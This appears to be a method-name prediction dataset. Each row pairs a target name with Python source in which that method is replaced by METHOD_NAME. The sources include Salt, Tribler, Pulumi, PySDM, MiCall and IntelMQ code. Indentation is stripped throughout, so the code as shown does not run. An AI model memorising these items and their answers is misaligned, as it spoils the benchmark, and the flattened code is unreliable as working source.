def cache_mods_path(tmp_path, cache_mod_name):
_cache_mods_path = tmp_path / "cache_mods"
mod_contents = """
import salt.utils.cache
def __virtual__():
return True
@salt.utils.cache.context_cache
def test_context_module():
if "called" in __context__:
__context__["called"] += 1
else:
__context__["called"] = 0
return __context__.value()
@salt.utils.cache.context_cache
def test_compare_context():
return __context__.value()
"""
with pytest.helpers.temp_file(
cache_mod_name + ".py", mod_contents, _cache_mods_path
):
yield _cache_mods_path
def test_context_wrapper(minion_opts, cache_mods_path):
"""
Test to ensure that a module which decorates itself
with a context cache can store and retrieve its contextual
data
"""
loader = salt.loader.LazyLoader(
[str(cache_mods_path)],
tag="rawmodule",
virtual_enable=False,
opts=minion_opts,
)
cache_test_func = loader["cache_mod.test_context_module"]
assert cache_test_func()["called"] == 0
assert cache_test_func()["called"] == 1
def test_set_cache(minion_opts, cache_mods_path, cache_mod_name, cache_dir):
"""
Tests to ensure the cache is written correctly
"""
context = {"c": "d"}
loader = salt.loader.LazyLoader(
[str(cache_mods_path)],
tag="rawmodule",
virtual_enable=False,
opts=minion_opts,
pack={"__context__": context, "__opts__": minion_opts},
)
cache_test_func = loader["cache_mod.test_context_module"]
# Call the function to trigger the context cache
assert cache_test_func()["called"] == 0
assert cache_test_func()["called"] == 1
assert cache_test_func()["called"] == 2
cache_file_name = "salt.loaded.ext.rawmodule.{}.p".format(cache_mod_name)
cached_file = cache_dir / "context" / cache_file_name
assert cached_file.exists()
# Test manual de-serialize
target_cache_data = salt.utils.data.decode(
salt.payload.loads(cached_file.read_bytes())
)
assert target_cache_data == dict(context, called=1)
# Test cache de-serialize
cc = cache.ContextCache(
minion_opts, "salt.loaded.ext.rawmodule.{}".format(cache_mod_name)
)
retrieved_cache = cc.get_cache_context()
assert retrieved_cache == dict(context, called=1)
def test_refill_cache(minion_opts, cache_mods_path):
"""
Tests to ensure that the context cache can rehydrate a wrapped function
"""
context = {"c": "d"}
loader = salt.loader.LazyLoader(
[str(cache_mods_path)],
tag="rawmodule",
virtual_enable=False,
opts=minion_opts,
pack={"__context__": context, "__opts__": minion_opts},
)
cache_test_func = loader["cache_mod.test_compare_context"]
# First populate the cache
ret = cache_test_func()
assert ret == context
# Then try to rehydrate a func
context_copy = context.copy()
context.clear()
# Compare to the context before it was emptied
ret = cache_test_func()
assert ret == context_copy
def test_everything(cache_dir):
"""
Make sure you can instantiate, add, update, remove, expire
"""
path = str(cache_dir / "minion")
# test instantiation
cd = cache.CacheDisk(0.3, path)
assert isinstance(cd, cache.CacheDisk)
# test to make sure it looks like a dict
assert "foo" not in cd
cd["foo"] = "bar"
assert "foo" in cd
assert cd["foo"] == "bar"
del cd["foo"]
assert "foo" not in cd
# test persistence
cd["foo"] = "bar"
cd2 = cache.CacheDisk(0.3, path)
assert "foo" in cd2
assert cd2["foo"] == "bar"
# test ttl
time.sleep(0.5)
assert "foo" not in cd
assert "foo" not in cd2
@pytest.mark.parametrize(
"data",
[
b"PK\x03\x04\n\x00\x00\x00\x00\x00\xb6B\x05S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x1c\x00test2/",
b"\xc3\x83\xc2\xa6\xc3\x83\xc2\xb8\xc3\x83\xc2\xa5",
],
)
def METHOD_NAME(cache_dir, data, caplog):
"""
Test that when the data in the cache raises a UnicodeDecodeError,
we do not raise an error.
"""
path = cache_dir / "minion"
path.touch()
cache_data = {
"CacheDisk_data": {
b"poc-minion": {
None: {
b"secrets": {
b"itsasecret": data,
b"CacheDisk_cachetime": {b"poc-minion": 1649339137.1236317},
}
}
}
}
}
with patch.object(
salt.utils.msgpack, "load", return_value=cache_data
), caplog.at_level(logging.DEBUG):
cd = cache.CacheDisk(0.3, str(path))
# this test used to rely on msgpack throwing errors when attempting to read an empty file
# the code now checks whether the file is empty and returns early, so we should never attempt a msgpack load
assert cd._dict == {}
assert not (
f"Error reading cache file at '{path}': Unpack failed: incomplete input"
in caplog.messages
)
def test_cache_corruption(cache_dir):
"""
Tests if the CacheDisk can survive a corrupted cache file.
"""
# Write valid cache file
cache_file = cache_dir / "minion"
cd = cache.CacheDisk(0.3, str(cache_file))
cd["test-key"] = "test-value"
del cd
# Add random string to the data to make the msgpack structure un-decodable
with cache_file.open("a") as f:
f.write("I am data that should corrupt the msgpack file")
# Reopen cache, try to fetch key
cd = cache.CacheDisk(0.3, str(cache_file))
# If the cache is unreadable, we want it to act like an empty cache (as
# if the file did not exist in the first place), and should raise a KeyError
with pytest.raises(KeyError):
assert cd["test-key"] | null |
get alive checked torrents | from __future__ import annotations
import random
from binascii import unhexlify
from typing import List, TYPE_CHECKING
from ipv8.lazy_community import lazy_wrapper
from pony.orm import db_session
from tribler.core.components.metadata_store.remote_query_community.remote_query_community import RemoteQueryCommunity
from tribler.core.components.popularity.community.payload import PopularTorrentsRequest, TorrentsHealthPayload
from tribler.core.components.popularity.community.version_community_mixin import VersionCommunityMixin
from tribler.core.components.torrent_checker.torrent_checker.dataclasses import HealthInfo
from tribler.core.utilities.pony_utils import run_threaded
from tribler.core.utilities.unicode import hexlify
from tribler.core.utilities.utilities import get_normally_distributed_positive_integers
if TYPE_CHECKING:
from tribler.core.components.torrent_checker.torrent_checker.torrent_checker import TorrentChecker
class PopularityCommunity(RemoteQueryCommunity, VersionCommunityMixin):
"""
Community for disseminating the content across the network.
Push:
- Every 5 seconds it gossips 10 random torrents to a random peer.
Pull:
- Every time it receives an introduction request, it sends a request
to return their popular torrents.
Gossiping is for checked torrents only.
"""
GOSSIP_INTERVAL_FOR_RANDOM_TORRENTS = 5 # seconds
GOSSIP_POPULAR_TORRENT_COUNT = 10
GOSSIP_RANDOM_TORRENT_COUNT = 10
community_id = unhexlify('9aca62f878969c437da9844cba29a134917e1648')
def __init__(self, *args, torrent_checker=None, **kwargs):
# Creating a separate instance of Network for this community to find more peers
super().__init__(*args, **kwargs)
self.torrent_checker: TorrentChecker = torrent_checker
self.add_message_handler(TorrentsHealthPayload, self.on_torrents_health)
self.add_message_handler(PopularTorrentsRequest, self.on_popular_torrents_request)
self.logger.info('Popularity Community initialized (peer mid %s)', hexlify(self.my_peer.mid))
self.register_task("gossip_random_torrents", self.gossip_random_torrents_health,
interval=PopularityCommunity.GOSSIP_INTERVAL_FOR_RANDOM_TORRENTS)
# Init version community message handlers
self.init_version_community()
def introduction_request_callback(self, peer, dist, payload):
super().introduction_request_callback(peer, dist, payload)
# Send request to peer to send popular torrents
self.ez_send(peer, PopularTorrentsRequest())
def METHOD_NAME(self) -> List[HealthInfo]:
if not self.torrent_checker:
return []
# Filter torrents that have seeders
return [health for health in self.torrent_checker.torrents_checked.values() if
health.seeders > 0 and health.leechers >= 0]
def gossip_random_torrents_health(self):
"""
Gossip random torrent health information to another peer.
"""
if not self.get_peers() or not self.torrent_checker:
return
random_torrents = self.get_random_torrents()
random_peer = random.choice(self.get_peers())
self.ez_send(random_peer, TorrentsHealthPayload.create(random_torrents, {}))
@lazy_wrapper(TorrentsHealthPayload)
async def on_torrents_health(self, peer, payload):
self.logger.debug(f"Received torrent health information for "
f"{len(payload.torrents_checked)} popular torrents and"
f" {len(payload.random_torrents)} random torrents")
health_tuples = payload.random_torrents + payload.torrents_checked
health_list = [HealthInfo(infohash, last_check=last_check, seeders=seeders, leechers=leechers)
for infohash, seeders, leechers, last_check in health_tuples]
for infohash in await run_threaded(self.mds.db, self.process_torrents_health, health_list):
# Get a single result per infohash to avoid duplicates
self.send_remote_select(peer=peer, infohash=infohash, last=1)
@db_session
def process_torrents_health(self, health_list: List[HealthInfo]):
infohashes_to_resolve = set()
for health in health_list:
added = self.mds.process_torrent_health(health)
if added:
infohashes_to_resolve.add(health.infohash)
return infohashes_to_resolve
@lazy_wrapper(PopularTorrentsRequest)
async def on_popular_torrents_request(self, peer, payload):
self.logger.debug("Received popular torrents health request")
popular_torrents = self.get_likely_popular_torrents()
self.ez_send(peer, TorrentsHealthPayload.create({}, popular_torrents))
def get_likely_popular_torrents(self) -> List[HealthInfo]:
checked_and_alive = self.METHOD_NAME()
if not checked_and_alive:
return []
num_torrents = len(checked_and_alive)
num_torrents_to_send = min(PopularityCommunity.GOSSIP_RANDOM_TORRENT_COUNT, num_torrents)
likely_popular_indices = self._get_likely_popular_indices(num_torrents_to_send, num_torrents)
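# Sort by seeders (descending) so that lower indices correspond to more popular torrents.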
sorted_torrents = sorted(list(checked_and_alive), key=lambda health: -health.seeders)
likely_popular_torrents = [sorted_torrents[i] for i in likely_popular_indices]
return likely_popular_torrents
def _get_likely_popular_indices(self, size, limit) -> List[int]:
"""
Returns a list of indices favoring the lower value numbers.
Assuming lower indices are more popular than higher ones, the returned list
favors the lower-indexed (more popular) values.
@param size: Number of indices to return
@param limit: Max number of indices that can be returned.
@return: List of non-repeated positive indices.
"""
return get_normally_distributed_positive_integers(size=size, upper_limit=limit)
def get_random_torrents(self) -> List[HealthInfo]:
checked_and_alive = list(self.METHOD_NAME())
if not checked_and_alive:
return []
num_torrents = len(checked_and_alive)
num_torrents_to_send = min(PopularityCommunity.GOSSIP_RANDOM_TORRENT_COUNT, num_torrents)
random_torrents = random.sample(checked_and_alive, num_torrents_to_send)
return random_torrents | null |
type | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetDpsCertificateResult',
'AwaitableGetDpsCertificateResult',
'get_dps_certificate',
'get_dps_certificate_output',
]
@pulumi.output_type
class GetDpsCertificateResult:
"""
The X509 Certificate.
"""
def __init__(__self__, etag=None, id=None, name=None, properties=None, system_data=None, METHOD_NAME=None):
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", METHOD_NAME)
@property
@pulumi.getter
def etag(self) -> str:
"""
The entity tag.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
The resource identifier.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the certificate.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.CertificatePropertiesResponse':
"""
properties of a certificate
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
Metadata pertaining to creation and last modification of the resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def METHOD_NAME(self) -> str:
"""
The resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetDpsCertificateResult(GetDpsCertificateResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDpsCertificateResult(
etag=self.etag,
id=self.id,
name=self.name,
properties=self.properties,
system_data=self.system_data,
METHOD_NAME=self.METHOD_NAME)
def get_dps_certificate(certificate_name: Optional[str] = None,
provisioning_service_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDpsCertificateResult:
"""
Get the certificate from the provisioning service.
:param str certificate_name: Name of the certificate to retrieve.
:param str provisioning_service_name: Name of the provisioning service the certificate is associated with.
:param str resource_group_name: Resource group identifier.
"""
__args__ = dict()
__args__['certificateName'] = certificate_name
__args__['provisioningServiceName'] = provisioning_service_name
__args__['resourceGroupName'] = resource_group_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:devices/v20221212:getDpsCertificate', __args__, opts=opts, typ=GetDpsCertificateResult).value
return AwaitableGetDpsCertificateResult(
etag=pulumi.get(__ret__, 'etag'),
id=pulumi.get(__ret__, 'id'),
name=pulumi.get(__ret__, 'name'),
properties=pulumi.get(__ret__, 'properties'),
system_data=pulumi.get(__ret__, 'system_data'),
METHOD_NAME=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_dps_certificate)
def get_dps_certificate_output(certificate_name: Optional[pulumi.Input[str]] = None,
provisioning_service_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetDpsCertificateResult]:
"""
Get the certificate from the provisioning service.
:param str certificate_name: Name of the certificate to retrieve.
:param str provisioning_service_name: Name of the provisioning service the certificate is associated with.
:param str resource_group_name: Resource group identifier.
"""
... | null |
test ll82 pd2 | # pylint: disable=missing-module-docstring,missing-class-docstring,missing-function-docstring
import numpy as np
from PySDM import Formulae
from PySDM.physics.constants import si
class TestFragmentationFunctions: # pylint:disable=too-few-public-methods
@staticmethod
def test_straub_sigma1():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_sigma1(CW=30.0)
# assert
np.testing.assert_array_almost_equal(params, [0.467381])
@staticmethod
def test_straub_mu1():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_mu1(sigma1=0.467381)
# assert
np.testing.assert_array_almost_equal(params, [-7.933269])
@staticmethod
def test_straub_sigma2():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_sigma2(CW=30.0)
# assert
np.testing.assert_array_almost_equal(params, [0.000182])
@staticmethod
def test_straub_mu2():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_mu2(ds=0.0)
# assert
np.testing.assert_array_almost_equal(params, [0.00095])
@staticmethod
def test_straub_sigma3():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_sigma3(CW=30.0)
# assert
np.testing.assert_array_almost_equal(params, [0.000149])
@staticmethod
def test_straub_mu3():
# arrange
formulae = Formulae(fragmentation_function="Straub2010Nf")
# act
params = formulae.fragmentation_function.params_mu3(ds=0.18 * si.cm)
# assert
np.testing.assert_array_almost_equal(params, [0.00162])
@staticmethod
def test_ll82_pf1():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_f1(
dl=0.36 * si.cm, dcoal=0.3744 * si.cm
)
# assert
np.testing.assert_array_equal(
params, [105.78851401149461, 0.36, 0.003771383856549656]
)
@staticmethod
def test_ll82_pf2():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_f2(ds=0.18 * si.cm)
# assert
np.testing.assert_array_almost_equal(
params, (31.081892267202157, 0.18, 0.01283519925273017)
)
@staticmethod
def test_ll82_pf3():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_f3(
ds=0.0715 * si.cm, dl=0.18 * si.cm
)
# assert
np.testing.assert_array_almost_equal(
params, (11.078017412424996, -3.4579794266811095, 0.21024917628814235)
)
@staticmethod
def test_ll82_ps1():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_s1(
dl=0.36 * si.cm, ds=0.18 * si.cm, dcoal=0.3744 * si.cm
)
# assert
np.testing.assert_array_almost_equal(
params, (55.710586181217394, 0.36, 0.007344262785151853)
)
@staticmethod
def test_ll82_ps2():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_s2(
dl=0.36 * si.cm, ds=0.18 * si.cm, St=3.705e-6 * si.J
)
# assert
np.testing.assert_array_almost_equal(
params, (13.120297517162507, -2.0082590717125437, 0.24857168491193957)
)
@staticmethod
def test_ll82_pd1():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_d1(
W1=2.67, dl=0.36 * si.cm, dcoal=0.3744 * si.cm, CKE=8.55e-6 * si.J
)
# assert
np.testing.assert_array_almost_equal(
params, (24.080107809942664, 0.28666015630152986, 0.016567297254868083)
)
@staticmethod
def METHOD_NAME():
# arrange
formulae = Formulae(fragmentation_function="LowList1982Nf")
# act
params = formulae.fragmentation_function.params_d2(
ds=0.18 * si.cm, dl=0.36 * si.cm, CKE=8.55e-6 * si.J
)
# assert
np.testing.assert_array_almost_equal(params, [0.0, -4.967578, -4.967578]) | null |
test write contig refs two groups | from io import StringIO
from pathlib import Path
from Bio import SeqIO
from pytest import fixture, mark
from micall.core.denovo import write_contig_refs, denovo, DEFAULT_DATABASE, genotype
from micall.blast_db.make_blast_db import make_blast_db, DEFAULT_PROJECTS
@fixture(scope='session', name='hcv_db')
def check_hcv_db():
db_path = Path(DEFAULT_DATABASE)
index_path = db_path.parent / "refs.fasta.nin"
build_needed = not index_path.exists()
if not build_needed:
projects_date = Path(DEFAULT_PROJECTS).stat().st_mtime
index_date = index_path.stat().st_mtime
build_needed = index_date < projects_date
if build_needed:
with open(DEFAULT_PROJECTS) as projects_json, \
open(DEFAULT_DATABASE, 'w') as refs_fasta:
make_blast_db(projects_json, refs_fasta)
assert index_path.exists()
return db_path
def test_make_blast_db_excludes_hivgha(hcv_db):
fasta_path = Path(DEFAULT_DATABASE)
with fasta_path.open() as f:
for reference in SeqIO.parse(f, 'fasta'):
# Exclude the Ghana project, because they're recombinant.
assert reference.name != 'HIV1-CRF02_AG-GH-AB286855-seed'
def test_write_contig_refs_two_sequences(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,1.0,HCV-1a,CAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def METHOD_NAME(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
ACCCGCCCCTAATAGGGGCGACACTCCGCCATGAATC
>bar
ACCATGGATCACTCCCCTGTGAGGAACTACTGTCTT
>baz
TGCAATGACAGCTTACAGACGGGTTTCCTCGCTTCCTTGTTTTACACCCA
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-2a,1.0,HCV-2b,ACCCGCCCCTAATAGGGGCGACACTCCGCCATGAATC
HCV-1g,1.0,HCV-1g,ACCATGGATCACTCCCCTGTGAGGAACTACTGTCTT
HCV-2b,1.0,HCV-2b,TGCAATGACAGCTTACAGACGGGTTTCCTCGCTTCCTTGTTTTACACCCA
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_write_contig_refs_not_found(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
CATCACATAGGAGA
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
unknown,0,,CATCACATAGGAGA
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_write_contig_refs_partial_match(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,0.75,HCV-1a,CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_write_contig_refs_reversed_match(tmpdir, hcv_db):
""" If BLAST match is reversed, then reverse the contig before reporting. """
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
GTCGTCGCCACACACGAGCATGGTGCAGTCCTGGAGCCCTGTCTCCTATGTGATG
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,0.75,HCV-1a,CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_genotype(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
blast_csv = StringIO()
expected_blast_csv = """\
contig_num,ref_name,score,match,pident,start,end,ref_start,ref_end
2,HCV-1g,37,0.67,100,19,55,8506,8542
2,HCV-1a,41,0.75,100,15,55,8518,8558
1,HCV-1a,41,1.0,100,1,41,8187,8227
"""
genotype(str(contigs_fasta), blast_csv=blast_csv)
assert expected_blast_csv == blast_csv.getvalue()
def test_write_contig_refs(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / "contigs.fasta"
contigs_fasta.write_text("""\
>foo
TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
>bar
CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-1a,1.0,HCV-1a,TCACCAGGACAGCGGGTTGAATTCCTCGTGCAAGCGTGGAA
HCV-1a,0.75,HCV-1a,CATCACATAGGAGACAGGGCTCCAGGACTGCACCATGCTCGTGTGTGGCGACGAC
"""
blast_csv = StringIO()
expected_blast_csv = """\
contig_num,ref_name,score,match,pident,start,end,ref_start,ref_end
2,HCV-1g,37,0.67,100,19,55,8506,8542
2,HCV-1a,41,0.75,100,15,55,8518,8558
1,HCV-1a,41,1.0,100,1,41,8187,8227
"""
write_contig_refs(str(contigs_fasta), contigs_csv, blast_csv=blast_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
assert expected_blast_csv == blast_csv.getvalue()
def test_write_contig_refs_none(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / 'contigs.fasta'
assert not contigs_fasta.exists()
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
"""
write_contig_refs(str(contigs_fasta), contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
def test_merged_contig(tmpdir, hcv_db):
contigs_fasta = Path(tmpdir) / 'contigs.fasta'
assert not contigs_fasta.exists()
merged_contigs_path = Path(tmpdir) / 'merged_contigs.csv'
merged_contigs_path.write_text("""\
contig
TGCACAAGACCCAACAACAATACAAGAAAAAGTATAAGGATAGGACCAGGA
""")
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HIV1-C-BR-JX140663-seed,1.0,HIV1-C-BR-JX140663-seed,TGCACAAGACCCAACAACAATACAAGAAAAAGTATAAGGATAGGACCAGGA
"""
with merged_contigs_path.open() as merged_contigs_csv:
write_contig_refs(str(contigs_fasta),
contigs_csv,
merged_contigs_csv=merged_contigs_csv)
assert expected_contigs_csv == contigs_csv.getvalue()
@mark.iva() # skip with -k-iva
def test_denovo_iva(tmpdir, hcv_db):
microtest_path = Path(__file__).parent / 'microtest'
contigs_csv = StringIO()
expected_contigs_csv = """\
ref,match,group_ref,contig
HCV-2a,1.0,HCV-2a,TGAGGGCCAAAAAGGTAACTTTTGATAGGATGCAAGTGC\
TCGACGCTCATTACGACTCAGTCTTAAAGGACATCAAGCTAGCGGCCTCCAAGGTCTCCG\
CGAGGCTCCTCACCCTGGAGGAGGCATGCCAGCTAACTCCACCCCATTCTGCAAGATCCAAATATGGGTTTGGGGCTA\
AGGAGGTGCGCAGCTTGTCCGGGAGGGCCGTTAACCACATCAAGTCCGTGTGGAAGGACCTCCTGGAAGACTCACAAA\
CACCAATTCCCACAACCATCATGGCCAAAAATGAAGTGTTCTGCGTGGACCCCACCAAGGGGGGTAAGAAAGCAGCTC\
GCCTCATCGTTTACCCTGACCTCGGCGTCAGGGTCTGCGAGAAGATGGCCCTTTATGATGTCACACAAAAGCTTCCTC\
AGGCGGTGATGGGGGCTTCTTATGGATTCCAGTACTCCC
"""
denovo(str(microtest_path / '2160A-HCV_S19_L001_R1_001.fastq'),
str(microtest_path / '2160A-HCV_S19_L001_R2_001.fastq'),
contigs_csv,
tmpdir)
assert contigs_csv.getvalue() == expected_contigs_csv | null |
process | # SPDX-FileCopyrightText: 2023 by Bundesamt für Sicherheit in der Informationstechnik (BSI)
#
# SPDX-License-Identifier: AGPL-3.0-or-later
# -*- coding: utf-8 -*-
"""
Copyright (c) 2023 by Bundesamt für Sicherheit in der Informationstechnik (BSI)
Software engineering by BSI & Intevation GmbH
This file tests IntelMQ bots in library mode (IEP007)
"""
import json
import unittest
from os.path import dirname, join
from pytest import raises
import intelmq.tests.bots.experts.domain_suffix.test_expert as domain_suffix_expert_test
from intelmq.bots.experts.domain_suffix.expert import DomainSuffixExpertBot
from intelmq.bots.experts.taxonomy.expert import TaxonomyExpertBot
from intelmq.bots.experts.url.expert import URLExpertBot
from intelmq.lib.bot import BotLibSettings, Dict39, ExpertBot
from intelmq.lib.message import Message, MessageFactory
from intelmq.tests.lib import test_parser_bot
EXAMPLE_DATA_URL = Dict39({'source.url': 'http://example.com/'})
EXAMPLE_DATA_URL_OUT = EXAMPLE_DATA_URL | {'source.fqdn': 'example.com',
'source.port': 80,
'source.urlpath': '/',
'protocol.application': 'http',
'protocol.transport': 'tcp'}
EXAMPLE_IP_INPUT = {"source.ip": "192.0.43.7", # icann.org.
"destination.ip": "192.0.43.8", # iana.org.
"time.observation": "2015-01-01T00:00:00+00:00",
}
class BrokenInitExpertBot(ExpertBot):
def init(self):
raise ValueError('This initialization intentionally raises an error!')
class RaisesOnFirstRunExpertBot(ExpertBot):
counter = 0
def init(self):
self.counter = 0
def METHOD_NAME(self):
event = self.receive_message()
self.counter += 1
if self.counter == 1:
raise ValueError('This initialization intentionally raises an error!')
self.send_message(event)
self.acknowledge_message()
def assertMessageEqual(actual, expected):
"""
Compare two messages as dicts.
"""
if isinstance(actual, Message):
actual = actual.to_dict(with_type=True)
else:
actual = actual.copy()
if isinstance(expected, Message):
expected = expected.to_dict(with_type=True)
else:
expected = expected.copy()
if 'time.observation' in actual:
del actual['time.observation']
if 'time.observation' in expected:
del expected['time.observation']
if 'output' in actual:
actual['output'] = json.loads(actual['output'])
if 'output' in expected:
expected['output'] = json.loads(expected['output'])
assert actual == expected
def test_dummy_parser_bot():
bot = test_parser_bot.DummyParserBot('dummy-bot', settings=BotLibSettings)
sent_messages = bot.process_message(test_parser_bot.EXAMPLE_REPORT.copy())
assertMessageEqual(sent_messages['output'][0], test_parser_bot.EXAMPLE_EVENT)
assertMessageEqual(sent_messages['error'][0], MessageFactory.from_dict(test_parser_bot.EXPECTED_DUMP[0].copy(), default_type='Report'))
assertMessageEqual(sent_messages['error'][1], MessageFactory.from_dict(test_parser_bot.EXPECTED_DUMP[1].copy(), default_type='Report'))
def test_domain_suffix():
domain_suffix = DomainSuffixExpertBot('domain-suffix',
settings=BotLibSettings | {'field': 'fqdn',
'suffix_file': join(dirname(domain_suffix_expert_test.__file__), 'public_suffix_list.dat')})
queues = domain_suffix.process_message({'source.fqdn': 'www.example.com'})
assert queues['output'][0]['source.domain_suffix'] == 'example.com'
def test_url_expert():
url_expert = URLExpertBot('url', settings=BotLibSettings)
queues = url_expert.process_message(EXAMPLE_DATA_URL.copy())
del url_expert
assert queues['output'] == [EXAMPLE_DATA_URL_OUT]
def test_url_and_taxonomy():
url_expert = URLExpertBot('url', settings=BotLibSettings)
queues_url = url_expert.process_message(EXAMPLE_DATA_URL.copy())
del url_expert
message = queues_url['output'][0]
taxonomy_expert = TaxonomyExpertBot('taxonomy', settings=BotLibSettings)
queues = taxonomy_expert.process_message(message)
assert queues['output'] == [Dict39(EXAMPLE_DATA_URL_OUT) | {'classification.taxonomy': 'other', 'classification.type': 'undetermined'}]
def test_bot_exception_init():
"""
When a bot raises an exception during Bot initialization
"""
with raises(ValueError):
BrokenInitExpertBot('broken', settings=BotLibSettings)
def test_bot_multi_message():
url_expert = URLExpertBot('url', settings=BotLibSettings)
queues = url_expert.process_message(EXAMPLE_DATA_URL.copy(), EXAMPLE_DATA_URL.copy())
del url_expert
assert queues['output'] == [EXAMPLE_DATA_URL_OUT] * 2
def test_bot_raises_and_second_message():
"""
The first message raises an error and the second message is processed normally.
